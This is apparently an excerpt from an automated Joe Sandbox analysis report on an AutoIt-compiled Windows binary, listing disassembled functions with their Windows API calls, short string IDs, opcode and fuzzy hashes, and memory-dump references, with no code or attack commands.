                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CapsDesktopDeviceReleaseWindow
                                          • String ID:
                                          • API String ID: 2889604237-0
                                          • Opcode ID: e84468953516f9d43972fd06fc803617380de596e0f97c555f130ae4eafc868b
                                          • Instruction ID: f5d851f844ae1d192730b1047417afbebef7257757af822c2ed89eb38747fc9b
                                          • Opcode Fuzzy Hash: e84468953516f9d43972fd06fc803617380de596e0f97c555f130ae4eafc868b
                                          • Instruction Fuzzy Hash: 55E01A79800204AFCB129F61D808A9D7BF1EF8C350F128418FE5AA7620CB3895918F50
                                          Function 0011B5EF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000C436A: _wcscpy.LIBCMT ref: 000C438D
                                            • Part of subcall function 000B4D37: __itow.LIBCMT ref: 000B4D62
                                            • Part of subcall function 000B4D37: __swprintf.LIBCMT ref: 000B4DAC
                                          • __wcsnicmp.LIBCMT ref: 0011B670
                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0011B739
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                          • String ID: LPT
                                          • API String ID: 3222508074-1350329615
                                          • Opcode ID: 6c4fca116334384063af1227e0459fa442038691b11689c010c62868ee73f2c6
                                          • Instruction ID: 9a47d56d7b4ee144386316e76bbf1798dfd7c1b7f6e24ebdf13913708d68f183
                                          • Opcode Fuzzy Hash: 6c4fca116334384063af1227e0459fa442038691b11689c010c62868ee73f2c6
                                          • Instruction Fuzzy Hash: DA615E75A04215AFCB18DF94C891EEEB7B5EB48310F158069F546AB3D1D770AE80CB51
                                          Function 000BE00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Sleep.KERNEL32(00000000), ref: 000BE01E
                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 000BE037
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: GlobalMemorySleepStatus
                                          • String ID: @
                                          • API String ID: 2783356886-2766056989
                                          • Opcode ID: 4a57d28b4e8fa51fb5e23fdcf9524404654a4f53b732c189c34767e56c83ee1a
                                          • Instruction ID: b6fc976b793eb1db73a421cb1e149758dad5ff53a8402f6b48fea42c1403d407
                                          • Opcode Fuzzy Hash: 4a57d28b4e8fa51fb5e23fdcf9524404654a4f53b732c189c34767e56c83ee1a
                                          • Instruction Fuzzy Hash: 1A514971418B449BE320AF50E885BEFB7F8FB84715F41485DF2D8411A2DB709669CB16
                                          Function 00138096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00138186
                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0013819B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: '
                                          • API String ID: 3850602802-1997036262
                                          • Opcode ID: de99bb9d15944758e8234f3a6e5ffb79235b6a743fbcef0eb21481d7ecb6a08d
                                          • Instruction ID: fa71a092963505c248fbc434aae89fd9731f6c71f7ac8dd247856d4afe5dd65b
                                          • Opcode Fuzzy Hash: de99bb9d15944758e8234f3a6e5ffb79235b6a743fbcef0eb21481d7ecb6a08d
                                          • Instruction Fuzzy Hash: 64410874A013099FDB14CF64C881BDABBB5FF09340F14016AF909AB391DB71A956CFA0
                                          Function 00122C5A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00122C6A
                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00122CA0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CrackInternet_memset
                                          • String ID: |
                                          • API String ID: 1413715105-2343686810
                                          • Opcode ID: 349bda228e357fec141ea547afc9a54e8389d3abcb106d5d2e86a8b4d8306315
                                          • Instruction ID: 28d7343a0a8637fc4b120e928221e7115494bd7cf2e57e6119ecce53944fd78c
                                          • Opcode Fuzzy Hash: 349bda228e357fec141ea547afc9a54e8389d3abcb106d5d2e86a8b4d8306315
                                          • Instruction Fuzzy Hash: 1B312871C00219ABCF11EFA0DC85EEEBFB9FF09304F100019F915A6262EB315A56DBA0
                                          Function 00137088 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                          Download Yara Rule
                                          APIs
                                          • DestroyWindow.USER32(?,?,?,?), ref: 0013713C
                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00137178
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Window$DestroyMove
                                          • String ID: static
                                          • API String ID: 2139405536-2160076837
                                          • Opcode ID: a53b6b019fa4d47b712ce5fe46147009cff3aa18f41cfbaf699abd6ff58647de
                                          • Instruction ID: 10a157a232230ddb27a8da6601437834c4806cbe646e30067fa938804558eb28
                                          • Opcode Fuzzy Hash: a53b6b019fa4d47b712ce5fe46147009cff3aa18f41cfbaf699abd6ff58647de
                                          • Instruction Fuzzy Hash: 2831AFB2100604AEDB25DF78CC80AFB73B9FF49720F109619FAA597191DB30AC91DB60
                                          Function 00113049 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 001130B8
                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 001130F3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: InfoItemMenu_memset
                                          • String ID: 0
                                          • API String ID: 2223754486-4108050209
                                          • Opcode ID: 241ac98b75782d564904fe4bed79e19f567fd83d1509063d40d5b8c67d9ace1c
                                          • Instruction ID: 800c5b987a7135ca17b300f04defd49394a6489f9acaa7e9cd4bf5794b3b69f6
                                          • Opcode Fuzzy Hash: 241ac98b75782d564904fe4bed79e19f567fd83d1509063d40d5b8c67d9ace1c
                                          • Instruction Fuzzy Hash: EF31D231A00305FBEB289F58C885BEEBBB9FF05350F144039E9A5A61A5D7709BC4CB51
                                          Function 001240B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                          Download Yara Rule
                                          APIs
                                          • __snwprintf.LIBCMT ref: 00124132
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: __snwprintf_memmove
                                          • String ID: , $$AUTOITCALLVARIABLE%d
                                          • API String ID: 3506404897-2584243854
                                          • Opcode ID: 32129f01aaf8e2c1110959935e20765d0d13825b3d0ae9833c7c70b3edccbf96
                                          • Instruction ID: 62042fc0fbf920bf2e63fc4188481dc52334c1ffe6c50427f161b129c70a71ec
                                          • Opcode Fuzzy Hash: 32129f01aaf8e2c1110959935e20765d0d13825b3d0ae9833c7c70b3edccbf96
                                          • Instruction Fuzzy Hash: B8219571A00228ABCF14EFA4DC91FED77B5EF59340F440458F905A7242DB70E965CBA1
                                          Function 00136CF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00136D86
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00136D91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: Combobox
                                          • API String ID: 3850602802-2096851135
                                          • Opcode ID: d63526f788488b699245f635150c38ca945bbb6de25765e4220023e54bee1ee0
                                          • Instruction ID: 88e3c49498d8aeadba831bb3990ab2607b1ee6a2f8e0373c9f26b201898256a2
                                          • Opcode Fuzzy Hash: d63526f788488b699245f635150c38ca945bbb6de25765e4220023e54bee1ee0
                                          • Instruction Fuzzy Hash: 561186713102087FEF159E94DC81EFB3B6AEB943A4F118125F9589B290D771DC518760
                                          Function 0013722C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000B2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000B214F
                                            • Part of subcall function 000B2111: GetStockObject.GDI32(00000011), ref: 000B2163
                                            • Part of subcall function 000B2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 000B216D
                                          • GetWindowRect.USER32(00000000,?), ref: 00137296
                                          • GetSysColor.USER32(00000012), ref: 001372B0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                          • String ID: static
                                          • API String ID: 1983116058-2160076837
                                          • Opcode ID: 966a4cd18284a7e363a04130236294f585af12e41d1b2d3a8c5c1ae0bedfb922
                                          • Instruction ID: 93476fb85bc621d81c24f72e3dffc77c0d278b145e7ebe5b11256ec788aa4cb7
                                          • Opcode Fuzzy Hash: 966a4cd18284a7e363a04130236294f585af12e41d1b2d3a8c5c1ae0bedfb922
                                          • Instruction Fuzzy Hash: F821177261420AAFDF15DFA8CC45AFA7BE8EB08314F014518FE55D3291E735A8919B50
                                          Function 00136F45 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowTextLengthW.USER32(00000000), ref: 00136FC7
                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00136FD6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: LengthMessageSendTextWindow
                                          • String ID: edit
                                          • API String ID: 2978978980-2167791130
                                          • Opcode ID: 0409d41742742252d06e7988b5f8b0bf8418edb4788840d3bc5bda625eff85cc
                                          • Instruction ID: 8e0289f1e1ff9d93180c83fff551f7ef671728be5e84490298a0a2c658ab91b3
                                          • Opcode Fuzzy Hash: 0409d41742742252d06e7988b5f8b0bf8418edb4788840d3bc5bda625eff85cc
                                          • Instruction Fuzzy Hash: 3A116A71100208BBEB118E64ACA4EFB3BAEEB05378F108714FA64971E0C775DC909B60
                                          Function 00113156 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 001131C9
                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 001131E8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: InfoItemMenu_memset
                                          • String ID: 0
                                          • API String ID: 2223754486-4108050209
                                          • Opcode ID: 940edd1f1b5b63deb4729d503d3fd5d1b70e0f8f9f94e5ddd62acf86b685f110
                                          • Instruction ID: ab109e65a59c62c8d4273a17725b9f1ff507c2452072c5a5d430c5641447c876
                                          • Opcode Fuzzy Hash: 940edd1f1b5b63deb4729d503d3fd5d1b70e0f8f9f94e5ddd62acf86b685f110
                                          • Instruction Fuzzy Hash: C8110836900214BBEB28DB98DC45BDD77BCAB15310F154131E826A72A4D770EF89CB92
                                          Function 001228A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 001228F8
                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00122921
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Internet$OpenOption
                                          • String ID: <local>
                                          • API String ID: 942729171-4266983199
                                          • Opcode ID: cb58391cf708fbe12b84289ea0f96fc31f1070c224d8d69d958d0ae9cf8d0f57
                                          • Instruction ID: 0746f4096300e63452366355948c1afda122477efe848f4d395b5a8cf3f80f7d
                                          • Opcode Fuzzy Hash: cb58391cf708fbe12b84289ea0f96fc31f1070c224d8d69d958d0ae9cf8d0f57
                                          • Instruction Fuzzy Hash: ED11A370501235BAEB298F519C89EFFFBACFF16755F10422AF64556100E37099A4D6E0
                                          Function 00128475 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 001286E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0012849D,?,00000000,?,?), ref: 001286F7
                                          • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001284A0
                                          • htons.WSOCK32(00000000,?,00000000), ref: 001284DD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWidehtonsinet_addr
                                          • String ID: 255.255.255.255
                                          • API String ID: 2496851823-2422070025
                                          • Opcode ID: e107fd0de4b084340d9248e08663a6272a01b0e4717571ab77d8dd40b31c934b
                                          • Instruction ID: b6758620d8d31e25dfb8ccc3fbca37259127337112f668756d37b621632ff802
                                          • Opcode Fuzzy Hash: e107fd0de4b084340d9248e08663a6272a01b0e4717571ab77d8dd40b31c934b
                                          • Instruction Fuzzy Hash: AE11C47560422AABDB10EF64DC86FEEB364FF15320F10861AFA15972D2DB71A820C795
                                          Function 001099BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                            • Part of subcall function 0010B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0010B7BD
                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00109A2B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 372448540-1403004172
                                          • Opcode ID: cd3a14f4616c80367b8646a0b7914b691237f91c1d371562f9b9b2c3f100074b
                                          • Instruction ID: 7f0676736a8d886c4c92d5508654dcfcd12a9e37004a41c73f3e3dcb692a39b4
                                          • Opcode Fuzzy Hash: cd3a14f4616c80367b8646a0b7914b691237f91c1d371562f9b9b2c3f100074b
                                          • Instruction Fuzzy Hash: 05012871A46124ABCB14EBA4CCA2DFE7369EF56320B400609F8B2532D3DF7058088650
                                          Function 0011934C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: __fread_nolock_memmove
                                          • String ID: EA06
                                          • API String ID: 1988441806-3962188686
                                          • Opcode ID: f8b2ed6e158b7e784317a3151a4f2b2bf9d85d15e48ea635a6f27a972d900189
                                          • Instruction ID: 70a7c6413d52ef87dd84b883d94995fbf05d0ac6d81005a972ea956d615f5037
                                          • Opcode Fuzzy Hash: f8b2ed6e158b7e784317a3151a4f2b2bf9d85d15e48ea635a6f27a972d900189
                                          • Instruction Fuzzy Hash: A701B9729042587EDB18C6A8CC56EFEBBF89B15301F00429FF552D62C2E9B5A6189760
                                          Function 001098B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                            • Part of subcall function 0010B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0010B7BD
                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00109923
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 372448540-1403004172
                                          • Opcode ID: c123157c147da27247da2eabd4c2f11b7996ed93c64c0e17a239f66dc4780445
                                          • Instruction ID: e5301c219955bfc51562f7774c7d0681324bb643822cfba18e7f5f9cb90772cb
                                          • Opcode Fuzzy Hash: c123157c147da27247da2eabd4c2f11b7996ed93c64c0e17a239f66dc4780445
                                          • Instruction Fuzzy Hash: 1B01A7B6A421086BCB14EBA0C962EFF77A89F16340F50011DB892632D3DB509E1896B1
                                          Function 0010993A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                            • Part of subcall function 0010B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0010B7BD
                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 001099A6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
